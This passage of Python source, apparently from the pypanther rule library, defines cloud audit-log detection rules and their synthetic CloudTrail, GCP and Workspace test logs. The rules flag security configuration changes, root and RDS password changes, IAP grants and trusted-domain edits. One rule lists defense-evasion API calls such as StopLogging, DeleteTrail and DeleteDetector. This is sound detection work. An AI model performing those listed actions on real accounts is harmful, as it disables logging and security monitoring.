        expected_result=False,
        log={
            "awsRegion": "us-west-2",
            "eventID": "1111",
            "eventName": "DescribeTrail",
            "eventSource": "cloudtrail.amazonaws.com",
            "eventTime": "2019-01-01T00:00:00Z",
            "eventType": "AwsApiCall",
            "eventVersion": "1.05",
            "readOnly": False,
            "recipientAccountId": "123456789012",
            "requestID": "1111",
            "requestParameters": {"name": "example-trail"},
            "responseElements": None,
            "sourceIPAddress": "111.111.111.111",
            "userAgent": "Mozilla/2.0 (compatible; NEWT ActiveX; Win32)",
            "userIdentity": {
                "accessKeyId": "1111",
                "accountId": "123456789012",
                "arn": "arn:aws:sts::123456789012:assumed-role/example-role/example-user",
                "invokedBy": "cloudformation.amazonaws.com",
                "principalId": "1111",
                "sessionContext": {
                    "attributes": {"creationDate": "2019-01-01T00:00:00Z", "mfaAuthenticated": "true"},
                    "sessionIssuer": {
                        "accountId": "123456789012",
                        "arn": "arn:aws:iam::123456789012:role/example-role",
                        "principalId": "1111",
                        "type": "Role",
                        "userName": "example-role",
                    },
                    "webIdFederationData": {},
                },
                "type": "AssumedRole",
            },
        },
    ),
    RuleTest(
        name="Non Security Configuration Change",
        expected_result=False,
        log={
            "awsRegion": "us-west-2",
            "eventID": "1111",
            "eventName": "PutPolicy",
            "eventSource": "iam.amazonaws.com",
            "eventTime": "2019-01-01T00:00:00Z",
            "eventType": "AwsApiCall",
            "eventVersion": "1.05",
            "readOnly": False,
            "recipientAccountId": "123456789012",
            "requestID": "1111",
            "requestParameters": {"name": "example-trail"},
            "responseElements": None,
            "sourceIPAddress": "111.111.111.111",
            "userAgent": "Mozilla/2.0 (compatible; NEWT ActiveX; Win32)",
            "userIdentity": {
                "accessKeyId": "1111",
                "accountId": "123456789012",
                "arn": "arn:aws:sts::123456789012:assumed-role/example-role/example-user",
                "invokedBy": "cloudformation.amazonaws.com",
                "principalId": "1111",
                "sessionContext": {
                    "attributes": {"creationDate": "2019-01-01T00:00:00Z", "mfaAuthenticated": "true"},
                    "sessionIssuer": {
                        "accountId": "123456789012",
                        "arn": "arn:aws:iam::123456789012:role/example-role",
                        "principalId": "1111",
                        "type": "Role",
                        "userName": "example-role",
                    },
                    "webIdFederationData": {},
                },
                "type": "AssumedRole",
            },
        },
    ),
    RuleTest(
        name="Security Configuration Not Changed - Error",
        expected_result=False,
        log={
            "awsRegion": "us-west-2",
            "errorCode": "ConflictException",
            "eventID": "1111",
            "eventName": "DeleteTrail",
            "eventSource": "cloudtrail.amazonaws.com",
            "eventTime": "2019-01-01T00:00:00Z",
            "eventType": "AwsApiCall",
            "eventVersion": "1.05",
            "readOnly": False,
            "recipientAccountId": "123456789012",
            "requestID": "1111",
            "requestParameters": {"name": "example-trail"},
            "responseElements": None,
            "sourceIPAddress": "111.111.111.111",
            "userAgent": "Mozilla/2.0 (compatible; NEWT ActiveX; Win32)",
            "userIdentity": {
                "accessKeyId": "1111",
                "accountId": "123456789012",
                "arn": "arn:aws:sts::123456789012:assumed-role/example-role/example-user",
                "invokedBy": "cloudformation.amazonaws.com",
                "principalId": "1111",
                "sessionContext": {
                    "attributes": {"creationDate": "2019-01-01T00:00:00Z", "mfaAuthenticated": "true"},
                    "sessionIssuer": {
                        "accountId": "123456789012",
                        "arn": "arn:aws:iam::123456789012:role/example-role",
                        "principalId": "1111",
                        "type": "Role",
                        "userName": "example-role",
                    },
                    "webIdFederationData": {},
                },
                "type": "AssumedRole",
            },
        },
    ),
    RuleTest(
        name="Security Configuration Changed - Allowlisted User",
        expected_result=False,
        log={
            "awsRegion": "us-west-2",
            "eventID": "1111",
            "eventName": "ExampleEvent",
            "eventSource": "cloudtrail.amazonaws.com",
            "eventTime": "2019-01-01T00:00:00Z",
            "eventType": "AwsApiCall",
            "eventVersion": "1.05",
            "readOnly": False,
            "recipientAccountId": "123456789012",
            "requestID": "1111",
            "requestParameters": {"name": "example-trail"},
            "responseElements": None,
            "sourceIPAddress": "111.111.111.111",
            "userAgent": "Mozilla/2.0 (compatible; NEWT ActiveX; Win32)",
            "userIdentity": {
                "accessKeyId": "1111",
                "accountId": "123456789012",
                "arn": "arn:aws:sts::123456789012:assumed-role/example-role/example-user",
                "invokedBy": "cloudformation.amazonaws.com",
                "principalId": "1111",
                "sessionContext": {
                    "attributes": {"creationDate": "2019-01-01T00:00:00Z", "mfaAuthenticated": "true"},
                    "sessionIssuer": {
                        "accountId": "123456789012",
                        "arn": "arn:aws:iam::123456789012:role/example-role",
                        "principalId": "1111",
                        "type": "Role",
                        "userName": "ExampleUser",
                    },
                    "webIdFederationData": {},
                },
                "type": "AssumedRole",
            },
        },
    ),
]


@panther_managed
class AWSCloudTrailSecurityConfigurationChange(Rule):
    id = "AWS.CloudTrail.SecurityConfigurationChange-prototype"
    display_name = "Account Security Configuration Changed"
    log_types = [LogType.AWS_CLOUDTRAIL]
    tags = ["AWS", "Defense Evasion:Impair Defenses"]
    default_severity = Severity.MEDIUM
    reports = {"MITRE ATT&CK": ["TA0005:T1562"]}
    default_description = "An account wide security configuration was changed."
    default_runbook = "Verify that this change was planned. If not, revert the change and update the access control policies to ensure this doesn't happen again.\n"
    default_reference = (
        "https://docs.aws.amazon.com/prescriptive-guidance/latest/aws-startup-security-baseline/controls-acct.html"
    )
    summary_attributes = ["eventName", "userAgent", "sourceIpAddress", "recipientAccountId", "p_any_aws_arns"]
    tests = aws_cloud_trail_security_configuration_change_tests
    SECURITY_CONFIG_ACTIONS = {
        "DeleteAccountPublicAccessBlock",
        "DeleteDeliveryChannel",
        "DeleteDetector",
        "DeleteFlowLogs",
        "DeleteRule",
        "DeleteTrail",
        "DisableEbsEncryptionByDefault",
        "DisableRule",
        "StopConfigurationRecorder",
        "StopLogging",
    }
    # Add expected events and users here to suppress alerts
    ALLOW_LIST = [{"userName": "ExampleUser", "eventName": "ExampleEvent"}]

    def rule(self, event):
        if not aws_cloudtrail_success(event):
            return False
        for entry in self.ALLOW_LIST:
            if fnmatch(
                deep_get(event, "userIdentity", "sessionContext", "sessionIssuer", "userName", default=""),
                entry["userName"],
            ):
                if fnmatch(event.get("eventName"), entry["eventName"]):
                    return False
        if event.get("eventName") == "UpdateDetector":
            return not deep_get(event, "requestParameters", "enable", default=True)
        return event.get("eventName") in self.SECURITY_CONFIG_ACTIONS

    def title(self, event):
        user = deep_get(event, "userIdentity", "userName") or deep_get(
            event,
            "userIdentity",
            "sessionContext",
            "sessionIssuer",
            "userName",
        )
        return f"Sensitive AWS API call {event.get('eventName')} made by {user}"

    def alert_context(self, event):
        return aws_rule_context(event)



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import aws_rule_context, deep_get

aws_cloud_trail_root_password_changed_tests: list[RuleTest] = [
    RuleTest(
        name="Root Password Changed",
        expected_result=True,
        log={
            "awsRegion": "us-east-1",
            "eventID": "1111",
            "eventName": "PasswordUpdated",
            "eventSource": "signin.amazonaws.com",
            "eventTime": "2019-01-01T00:00:00Z",
            "eventType": "AwsConsoleSignIn",
            "eventVersion": "1.05",
            "recipientAccountId": "123456789012",
            "requestID": "1111",
            "requestParameters": None,
            "responseElements": {"PasswordUpdated": "Success"},
            "sourceIPAddress": "111.111.111.111",
            "userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36",
            "userIdentity": {
                "accesKeyId": "1111",
                "accessKeyId": "",
                "accountId": "123456789012",
                "arn": "arn:aws:iam::123456789012:root",
                "principalId": "123456789012",
                "type": "Root",
            },
        },
    ),
    RuleTest(
        name="Root Password Change Failed",
        expected_result=False,
        log={
            "awsRegion": "us-east-1",
            "eventID": "1111",
            "eventName": "PasswordUpdated",
            "eventSource": "signin.amazonaws.com",
            "eventTime": "2019-01-01T00:00:00Z",
            "eventType": "AwsConsoleSignIn",
            "eventVersion": "1.05",
            "recipientAccountId": "123456789012",
            "requestID": "1111",
            "requestParameters": None,
            "responseElements": {"PasswordUpdated": "Failure"},
            "sourceIPAddress": "111.111.111.111",
            "userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36",
            "userIdentity": {
                "accesKeyId": "1111",
                "accessKeyId": "",
                "accountId": "123456789012",
                "arn": "arn:aws:iam::123456789012:root",
                "principalId": "123456789012",
                "type": "Root",
            },
        },
    ),
]


@panther_managed
class AWSCloudTrailRootPasswordChanged(Rule):
    id = "AWS.CloudTrail.RootPasswordChanged-prototype"
    display_name = "Root Password Changed"
    log_types = [LogType.AWS_CLOUDTRAIL]
    tags = ["AWS", "Identity and Access Management", "Persistence:Account Manipulation"]
    default_severity = Severity.HIGH
    reports = {"MITRE ATT&CK": ["TA0003:T1098"]}
    default_description = "Someone manually changed the Root console login password.\n"
    default_runbook = "Verify that the root password change was authorized. If not, AWS support should be contacted immediately as the root account cannot be recovered through normal means and grants complete access to the account.\n"
    default_reference = "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_passwords_change-root.html"
    summary_attributes = ["userAgent", "sourceIpAddress", "recipientAccountId", "p_any_aws_arns"]
    tests = aws_cloud_trail_root_password_changed_tests

    def rule(self, event):
        # Only check password update changes
        if event.get("eventName") != "PasswordUpdated":
            return False
        # Only check root activity
        if deep_get(event, "userIdentity", "type") != "Root":
            return False
        # Only alert if the login was a success
        return deep_get(event, "responseElements", "PasswordUpdated") == "Success"

    def alert_context(self, event):
        return aws_rule_context(event)



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import deep_get

gcp_user_addedto_iap_protected_service_tests: list[RuleTest] = [
    RuleTest(
        name="other",
        expected_result=False,
        log={
            "insertid": "abcdefghijklmn",
            "logname": "projects/gcp-project1/logs/cloudaudit.googleapis.com%2Factivity",
            "operation": {
                "id": "1234567890123-gcp-project1:abcdefghijklmnopqrstuvwz",
                "last": True,
                "producer": "bigquery.googleapis.com",
            },
            "p_any_emails": ["user@company.io"],
            "p_any_ip_addresses": ["1.2.3.4"],
            "p_event_time": "2023-03-28 18:37:06.079",
            "p_log_type": "GCP.AuditLog",
            "p_parse_time": "2023-03-28 18:38:14.478",
            "p_row_id": "06bf03d9d5dfbadba981899e1787bf05",
            "p_schema_version": 0,
            "p_source_id": "964c7894-9a0d-4ddf-864f-0193438221d6",
            "p_source_label": "gcp-logsource",
            "protoPayload": {
                "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                "authenticationInfo": {"principalEmail": "user@company.io"},
                "authorizationInfo": [
                    {
                        "granted": True,
                        "permission": "bigquery.tables.delete",
                        "resource": "projects/gcp-project1/datasets/test1/tables/newtable",
                    },
                ],
                "metadata": {
                    "@type": "type.googleapis.com/google.cloud.audit.BigQueryAuditMetadata",
                    "methodName": "google.cloud.bigquery.v2.JobService.InsertJob",
                    "requestMetadata": {
                        "callerIP": "1.2.3.4",
                        "callerSuppliedUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36,gzip(gfe),gzip(gfe)",
                    },
                    "resourceName": "projects/gcp-project1/datasets/test1/tables/newtable",
                    "serviceName": "bigquery.googleapis.com",
                    "status": {},
                    "tableDeletion": {
                        "jobName": "projects/gcp-project1/jobs/bquxjob_5e4a0679_18729a639d7",
                        "reason": "QUERY",
                    },
                },
                "receivetimestamp": "2023-03-28 18:37:06.745",
                "resource": {
                    "labels": {"dataset_id": "test1", "project_id": "gcp-project1"},
                    "type": "bigquery_dataset",
                },
                "severity": "NOTICE",
                "timestamp": "2023-03-28 18:37:06.079",
            },
        },
    ),
    RuleTest(
        name="Other IAP Event",
        expected_result=True,
        log={
            "insertId": "46ee5sd38mw",
            "logName": "projects/gcp-project1/logs/cloudaudit.googleapis.com%2Factivity",
            "p_any_emails": ["staging@company.io"],
            "p_any_ip_addresses": ["1.2.3.4"],
            "p_event_time": "2023-04-25 19:20:57.024",
            "p_log_type": "GCP.AuditLog",
            "p_parse_time": "2023-04-25 19:22:14.743",
            "p_row_id": "b2e9b7f5dc85a69981fac2e417b6bb03",
            "p_schema_version": 0,
            "p_source_id": "5b77391b-afad-46c7-8ddc-b8e21d4726b3",
            "p_source_label": "gcplogsource2",
            "protoPayload": {
                "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                "authenticationInfo": {"principalEmail": "staging@company.io"},
                "authorizationInfo": [
                    {
                        "granted": True,
                        "permission": "iap.webServices.setIamPolicy",
                        "resourceAttributes": {
                            "name": "projects/123456789012/iap_web/compute/services/7312383563505470445",
                            "service": "iap.googleapis.com",
                            "type": "iap.googleapis.com/WebService",
                        },
                    },
                ],
                "methodName": "google.cloud.iap.v1.IdentityAwareProxyAdminService.SetIamPolicy",
                "request": {
                    "@type": "type.googleapis.com/google.iam.v1.SetIamPolicyRequest",
                    "policy": {"etag": "BwX6LgT4YMw="},
                    "resource": "projects/123456789012/iap_web/compute/services/7312383563505470445",
                },
                "requestMetadata": {
                    "callerIP": "1.2.3.4",
                    "callerSuppliedUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36,gzip(gfe),gzip(gfe)",
                    "destinationAttributes": {},
                    "requestAttributes": {"auth": {}, "time": "2023-04-25T19:20:57.295723118Z"},
                },
                "resourceName": "projects/123456789012/iap_web/compute/services/7312383563505470445",
                "response": {"@type": "type.googleapis.com/google.iam.v1.Policy", "etag": "BwX6LgXbpsw="},
                "serviceName": "iap.googleapis.com",
            },
            "receiveTimestamp": "2023-04-25 19:20:58.16",
            "resource": {
                "labels": {"backend_service_id": "", "location": "", "project_id": "gcp-project1"},
                "type": "gce_backend_service",
            },
            "severity": "NOTICE",
            "timestamp": "2023-04-25 19:20:57.024",
        },
    ),
    RuleTest(
        name="Add User to IAP",
        expected_result=True,
        log={
            "insertId": "yyultvcrhy",
            "logName": "projects/gcp-projet1/logs/cloudaudit.googleapis.com%2Factivity",
            "p_any_emails": ["staging@company.io"],
            "p_any_ip_addresses": ["1.2.3.4"],
            "p_event_time": "2023-04-25 19:20:42.138",
            "p_log_type": "GCP.AuditLog",
            "p_parse_time": "2023-04-25 19:22:14.743",
            "p_row_id": "b2e9b7f5dc85a69981fac2e417b7bb03",
            "p_schema_version": 0,
            "p_source_id": "5b77391b-afad-46c7-8ddc-b8e21d4726b3",
            "p_source_label": "gcplogsource2",
            "protoPayload": {
                "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                "authenticationInfo": {"principalEmail": "staging@company.io"},
                "authorizationInfo": [
                    {
                        "granted": True,
                        "permission": "iap.webServices.setIamPolicy",
                        "resourceAttributes": {
                            "name": "projects/123456789012/iap_web/compute/services/7312383563505470445",
                            "service": "iap.googleapis.com",
                            "type": "iap.googleapis.com/WebService",
                        },
                    },
                ],
                "methodName": "google.cloud.iap.v1.IdentityAwareProxyAdminService.SetIamPolicy",
                "request": {
                    "@type": "type.googleapis.com/google.iam.v1.SetIamPolicyRequest",
                    "policy": {
                        "bindings": [
                            {
                                "members": ["serviceAccount:test-account3@gcp-project1.iam.gserviceaccount.com"],
                                "role": "roles/viewer",
                            },
                        ],
                        "etag": "ACAB",
                    },
                    "resource": "projects/123456789012/iap_web/compute/services/7312383563505470445",
                },
                "requestMetadata": {
                    "callerIP": "1.2.3.4",
                    "callerSuppliedUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36,gzip(gfe),gzip(gfe)",
                    "destinationAttributes": {},
                    "requestAttributes": {"auth": {}, "time": "2023-04-25T19:20:42.399215146Z"},
                },
                "resourceName": "projects/123456789012/iap_web/compute/services/7312383563505470445",
                "response": {
                    "@type": "type.googleapis.com/google.iam.v1.Policy",
                    "bindings": [
                        {
                            "members": ["serviceAccount:test-account3@gcp-project1.iam.gserviceaccount.com"],
                            "role": "roles/viewer",
                        },
                    ],
                    "etag": "BwX6LgT4YMw=",
                },
                "serviceName": "iap.googleapis.com",
            },
            "receiveTimestamp": "2023-04-25 19:20:43.033",
            "resource": {
                "labels": {"backend_service_id": "", "location": "", "project_id": "gcp-project1"},
                "type": "gce_backend_service",
            },
            "severity": "NOTICE",
            "timestamp": "2023-04-25 19:20:42.138",
        },
    ),
]


@panther_managed
class GCPUserAddedtoIAPProtectedService(Rule):
    default_description = "A user has been granted access to a IAP protected service."
    display_name = "GCP User Added to IAP Protected Service"
    default_runbook = "Note: GCP logs all bindings everytime this event occurs, not just changes. Bindings should be reviewed to ensure no unintended users have been added. "
    default_reference = "https://cloud.google.com/iap/docs/managing-access"
    default_severity = Severity.LOW
    log_types = [LogType.GCP_AUDIT_LOG]
    id = "GCP.User.Added.to.IAP.Protected.Service-prototype"
    tests = gcp_user_addedto_iap_protected_service_tests

    def rule(self, event):
        return (
            deep_get(event, "protoPayload", "methodName", default="")
            == "google.cloud.iap.v1.IdentityAwareProxyAdminService.SetIamPolicy"
        )

    def title(self, event):
        actor = deep_get(event, "protoPayload", "authenticationInfo", "principalEmail", default="<ACTOR_NOT_FOUND>")
        service = deep_get(event, "protoPayload", "request", "resource", default="<RESOURCE_NOT_FOUND>")
        return f"GCP: [{actor}] modified user access to IAP Protected Service [{service}]"

    def alert_context(self, event):
        bindings = deep_get(event, "protoPayload", "request", "policy", "bindings", default=[{}])
        return {"bindings": bindings}



import argparse


def for_filtering(parser: argparse.ArgumentParser) -> None:
    parser.add_argument(
        "--log-types",
        help="Filter by log types (i.e --log-types AWS.ALB Panther.Audit)",
        default=None,
        nargs="+",
        required=False,
    )
    parser.add_argument(
        "--id",
        help="Filter by id",
        type=str,
        default=None,
        required=False,
    )
    parser.add_argument(
        "--create-alert",
        help="Filter by create alert",
        type=bool,
        default=None,
        required=False,
    )
    parser.add_argument(
        "--dedup-period-minutes",
        help="Filter by dedup period minutes",
        type=int,
        default=None,
        required=False,
    )
    parser.add_argument(
        "--display-name",
        help="Filter by display name",
        type=str,
        default=None,
        required=False,
    )
    parser.add_argument(
        "--enabled",
        help="Filter by enabled status",
        type=bool,
        default=None,
        required=False,
    )
    parser.add_argument(
        "--summary-attributes",
        help="Filter by summary attributes (i.e --summary-attributes abc dce)",
        nargs="+",
        default=None,
        required=False,
    )
    parser.add_argument(
        "--threshold",
        help="Filter by threshold",
        type=int,
        default=None,
        required=False,
    )
    parser.add_argument(
        "--tags",
        help="Filter by tags (e.g. --tags security prod)",
        nargs="+",
        default=None,
        required=False,
    )
    parser.add_argument(
        "--default-severity",
        help="Filter by default severity",
        type=str,
        default=None,
        required=False,
    )
    parser.add_argument(
        "--default-description",
        help="Filter by default description",
        type=str,
        default=None,
        required=False,
    )
    parser.add_argument(
        "--default-reference",
        help="Filter by default reference",
        type=str,
        default=None,
        required=False,
    )
    parser.add_argument(
        "--default-runbook",
        help="Filter by default runbook",
        type=str,
        default=None,
        required=False,
    )
    parser.add_argument(
        "--default-destinations",
        help="Filter by default destinations",
        nargs="+",
        default=None,
        required=False,
    )



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import deep_get

g_suite_workspace_trusted_domains_allowlist_tests: list[RuleTest] = [
    RuleTest(
        name="Workspace Admin Remove Trusted Domain",
        expected_result=True,
        log={
            "actor": {"callerType": "USER", "email": "user@example.io", "profileId": "110506209185950390992"},
            "id": {
                "applicationName": "admin",
                "customerId": "D12345",
                "time": "2022-12-11 00:01:34.643000000",
                "uniqueQualifier": "-2972206985263071668",
            },
            "kind": "admin#reports#activity",
            "name": "REMOVE_TRUSTED_DOMAINS",
            "p_source_label": "Staging",
            "parameters": {"DOMAIN_NAME": "evilexample.com"},
            "type": "DOMAIN_SETTINGS",
        },
    ),
    RuleTest(
        name="Workspace Admin Add Trusted Domain",
        expected_result=True,
        log={
            "actor": {"callerType": "USER", "email": "user@example.io", "profileId": "110506209185950390992"},
            "id": {
                "applicationName": "admin",
                "customerId": "D12345",
                "time": "2022-12-10 23:59:24.470000000",
                "uniqueQualifier": "-334478670839567761",
            },
            "kind": "admin#reports#activity",
            "name": "ADD_TRUSTED_DOMAINS",
            "parameters": {"DOMAIN_NAME": "evilexample.com"},
            "type": "DOMAIN_SETTINGS",
        },
    ),
    RuleTest(
        name="Admin Set Default Calendar SHARING_OUTSIDE_DOMAIN Setting to MANAGE_ACCESS",
        expected_result=False,
        log={
            "actor": {"callerType": "USER", "email": "example@example.io", "profileId": "12345"},
            "id": {
                "applicationName": "admin",
                "customerId": "D12345",
                "time": "2022-12-11 01:06:26.303000000",
                "uniqueQualifier": "-12345",
            },
            "ipAddress": "12.12.12.12",
            "kind": "admin#reports#activity",
            "name": "CHANGE_CALENDAR_SETTING",
            "parameters": {
                "DOMAIN_NAME": "example.io",
                "NEW_VALUE": "MANAGE_ACCESS",
                "OLD_VALUE": "READ_WRITE_ACCESS",
                "ORG_UNIT_NAME": "Example IO",
                "SETTING_NAME": "SHARING_OUTSIDE_DOMAIN",
            },
            "type": "CALENDAR_SETTINGS",
        },
    ),
    RuleTest(
        name="ListObject Type",
        expected_result=False,
        log={
            "actor": {"email": "user@example.io", "profileId": "118111111111111111111"},
            "id": {
                "applicationName": "drive",
                "customerId": "D12345",
                "time": "2022-12-20 17:27:47.080000000",
                "uniqueQualifier": "-7312729053723258069",
            },
            "ipAddress": "12.12.12.12",
            "kind": "admin#reports#activity",
            "name": "rename",
            "parameters": {
                "actor_is_collaborator_account": None,
                "billable": True,
                "doc_id": "1GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG",
                "doc_title": "Document Title- Found Here",
                "doc_type": "presentation",
                "is_encrypted": None,
                "new_value": ["Document Title- Found Here"],
                "old_value": ["Document Title- Old"],
                "owner": "user@example.io",
                "owner_is_shared_drive": None,
                "owner_is_team_drive": None,
                "primary_event": True,
                "visibility": "private",
            },
            "type": "access",
        },
    ),
]


@panther_managed
class GSuiteWorkspaceTrustedDomainsAllowlist(Rule):
    id = "GSuite.Workspace.TrustedDomainsAllowlist-prototype"
    display_name = "GSuite Workspace Trusted Domain Allowlist Modified"
    log_types = [LogType.GSUITE_ACTIVITY_EVENT]
    tags = ["GSuite"]
    default_severity = Severity.MEDIUM
    default_description = "A Workspace Admin Has Modified The Trusted Domains List\n"
    default_reference = "https://support.google.com/a/answer/6160020?hl=en&sjid=864417124752637253-EU"
    default_runbook = "Verify the intent of this modification. If intent cannot be verified, then an indicator search on the actor is advised.\n"
    summary_attributes = ["actor:email"]
    reports = {"MITRE ATT&CK": ["TA0003:T1098"]}
    tests = g_suite_workspace_trusted_domains_allowlist_tests

    def rule(self, event):
        return event.get("type") == "DOMAIN_SETTINGS" and event.get("name", "").endswith("_TRUSTED_DOMAINS")

    def title(self, event):
        return f"GSuite Workspace Trusted Domains Modified [{event.get('name', '<NO_EVENT_NAME>')}] with [{deep_get(event, 'parameters', 'DOMAIN_NAME', default='<NO_DOMAIN_NAME>')}] performed by [{deep_get(event, 'actor', 'email', default='<NO_ACTOR_FOUND>')}]"



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import deep_get

awsrds_master_password_updated_tests: list[RuleTest] = [
    RuleTest(
        name="Allocated storage modified",
        expected_result=False,
        log={
            "awsRegion": "us-west-1",
            "eventCategory": "Management",
            "eventID": "cb82857f-302d-4d6c-b516-589ec39dee7c",
            "eventName": "ModifyDBInstance",
            "eventSource": "rds.amazonaws.com",
            "eventTime": "2022-09-24 00:38:26",
            "eventType": "AwsApiCall",
            "eventVersion": "1.08",
            "managementEvent": True,
            "p_any_aws_account_ids": ["123456789012"],
            "p_any_aws_arns": [
                "arn:aws:iam::123456789012:role/Admin",
                "arn:aws:kms:us-west-1:123456789012:key/e2c16323-1c31-45fb-adda-07e5c9f78997",
                "arn:aws:rds:us-west-1:123456789012:db:my-database",
                "arn:aws:sts::123456789012:assumed-role/Admin/Jack",
            ],
            "p_any_domain_names": ["AWS Internal"],
            "p_any_trace_ids": ["ASIASWJRT64ZWCAMGCWI"],
            "p_event_time": "2022-09-24 00:38:26",
            "p_log_type": "AWS.CloudTrail",
            "p_parse_time": "2022-09-24 00:42:44.436",
            "p_row_id": "da110a31e6a4cfa7c8a888cb13f59305",
            "p_source_id": "125a8146-e3ea-454b-aed7-9e08e735b670",
            "p_source_label": "CloudTrail",
            "readOnly": False,
            "recipientAccountId": "123456789012",
            "requestID": "bd420698-bbb7-4ec3-b109-190e03adc1f4",
            "requestParameters": {
                "allocatedStorage": 22,
                "allowMajorVersionUpgrade": False,
                "applyImmediately": True,
                "dBInstanceIdentifier": "my-database",
                "maxAllocatedStorage": 1000,
            },
            "responseElements": {
                "allocatedStorage": 20,
                "associatedRoles": [],
                "autoMinorVersionUpgrade": True,
                "availabilityZone": "us-west-1b",
                "backupRetentionPeriod": 0,
                "backupTarget": "region",
                "cACertificateIdentifier": "rds-ca-2019",
                "copyTagsToSnapshot": True,
                "customerOwnedIpEnabled": False,
                "dBInstanceArn": "arn:aws:rds:us-west-1:123456789012:db:my-database",
                "dBInstanceClass": "db.t3.micro",
                "dBInstanceIdentifier": "my-database",
                "dBInstanceStatus": "available",
                "dBName": "test",
                "dBParameterGroups": [{"dBParameterGroupName": "default.mysql8.0", "parameterApplyStatus": "in-sync"}],
                "dBSecurityGroups": [],
                "dBSubnetGroup": {
                    "dBSubnetGroupDescription": "Created from the RDS Management Console",
                    "dBSubnetGroupName": "default-vpc-f9999999",
                    "subnetGroupStatus": "Complete",
                    "subnets": [
                        {
                            "subnetAvailabilityZone": {"name": "us-west-1c"},
                            "subnetIdentifier": "subnet-8cb458ea",
                            "subnetOutpost": {},
                            "subnetStatus": "Active",
                        },
                        {
                            "subnetAvailabilityZone": {"name": "us-west-1b"},
                            "subnetIdentifier": "subnet-8382bbd8",
                            "subnetOutpost": {},
                            "subnetStatus": "Active",
                        },
                    ],
                    "vpcId": "vpc-f9999999",
                },
                "dbInstancePort": 0,
                "dbiResourceId": "db-FEVDSUCWJ43PXONVT6ZU2TK4WY",
                "deletionProtection": False,
                "domainMemberships": [],
                "enabledCloudwatchLogsExports": ["audit", "error", "general"],
                "endpoint": {
                    "address": "my-database.cbsugyyyyyyy.us-west-1.rds.amazonaws.com",
                    "hostedZoneId": "Z10WI91S59XXQN",
                    "port": 3306,
                },
                "engine": "mysql",
                "engineVersion": "8.0.28",
                "httpEndpointEnabled": False,
                "iAMDatabaseAuthenticationEnabled": False,
                "instanceCreateTime": "Sep 23, 2022 11:25:46 PM",
                "kmsKeyId": "arn:aws:kms:us-west-1:123456789012:key/e2c16323-1c31-45fb-adda-07e5c9f78997",
                "licenseModel": "general-public-license",
                "masterUsername": "admin",
                "maxAllocatedStorage": 1000,
                "monitoringInterval": 0,
                "multiAZ": False,
                "networkType": "IPV4",
                "optionGroupMemberships": [{"optionGroupName": "default:mysql-8-0", "status": "in-sync"}],
                "pendingModifiedValues": {"allocatedStorage": 22},
                "performanceInsightsEnabled": False,
                "preferredBackupWindow": "11:52-12:22",
                "preferredMaintenanceWindow": "tue:13:03-tue:13:33",
                "publiclyAccessible": True,
                "readReplicaDBInstanceIdentifiers": [],
                "storageEncrypted": True,
                "storageThroughput": 0,
                "storageType": "gp2",
                "tagList": [],
                "vpcSecurityGroups": [{"status": "active", "vpcSecurityGroupId": "sg-d963a5a4"}],
            },
            "sessionCredentialFromConsole": True,
            "sourceIPAddress": "AWS Internal",
            "userAgent": "AWS Internal",
            "userIdentity": {
                "accessKeyId": "ASIASWJRT64ZWCAMGCWI",
                "accountId": "123456789012",
                "arn": "arn:aws:sts::123456789012:assumed-role/Admin/Jack",
                "principalId": "AROAJ4ULUNLE6DYF4PCOK:jack",
                "sessionContext": {
                    "attributes": {"creationDate": "2022-09-23T23:17:13Z", "mfaAuthenticated": "true"},
                    "sessionIssuer": {
                        "accountId": "123456789012",
                        "arn": "arn:aws:iam::123456789012:role/Admin",
                        "principalId": "AROAJ4ULUNLE6DYF4PCOK",
                        "type": "Role",
                        "userName": "Admin",
                    },
                    "webIdFederationData": {},
                },
                "type": "AssumedRole",
            },
        },
    ),
    RuleTest(
        name="Master pass modified",
        expected_result=True,
        log={
            "awsRegion": "us-west-1",
            "eventCategory": "Management",
            "eventID": "09191e37-4632-4722-82bf-50288436cf47",
            "eventName": "ModifyDBInstance",
            "eventSource": "rds.amazonaws.com",
            "eventTime": "2022-09-24 00:28:15",
            "eventType": "AwsApiCall",
            "eventVersion": "1.08",
            "managementEvent": True,
            "p_any_aws_account_ids": ["123456789012"],
            "p_any_aws_arns": [
                "arn:aws:iam::123456789012:role/Admin",
                "arn:aws:kms:us-west-1:123456789012:key/e2c16323-1c31-45fb-adda-07e5c9f78997",
                "arn:aws:rds:us-west-1:123456789012:db:my-database",
                "arn:aws:sts::123456789012:assumed-role/Admin/Jack",
            ],
            "p_any_domain_names": ["AWS Internal"],
            "p_any_trace_ids": ["ASIASWJRT64ZWCAMGCWI"],
            "p_event_time": "2022-09-24 00:28:15",
            "p_log_type": "AWS.CloudTrail",
            "p_parse_time": "2022-09-24 00:32:43.679",
            "p_row_id": "eea2890fafffb7b88fae80cb138a08",
            "p_source_id": "b00eb354-da7a-49dd-9cc6-32535e32096a",
            "p_source_label": "CloudTrail",
            "readOnly": False,
            "recipientAccountId": "123456789012",
            "requestID": "93fba047-0282-4c53-b3a6-1c3bb684f563",
            "requestParameters": {
                "allowMajorVersionUpgrade": False,
                "applyImmediately": True,
                "dBInstanceIdentifier": "my-database",
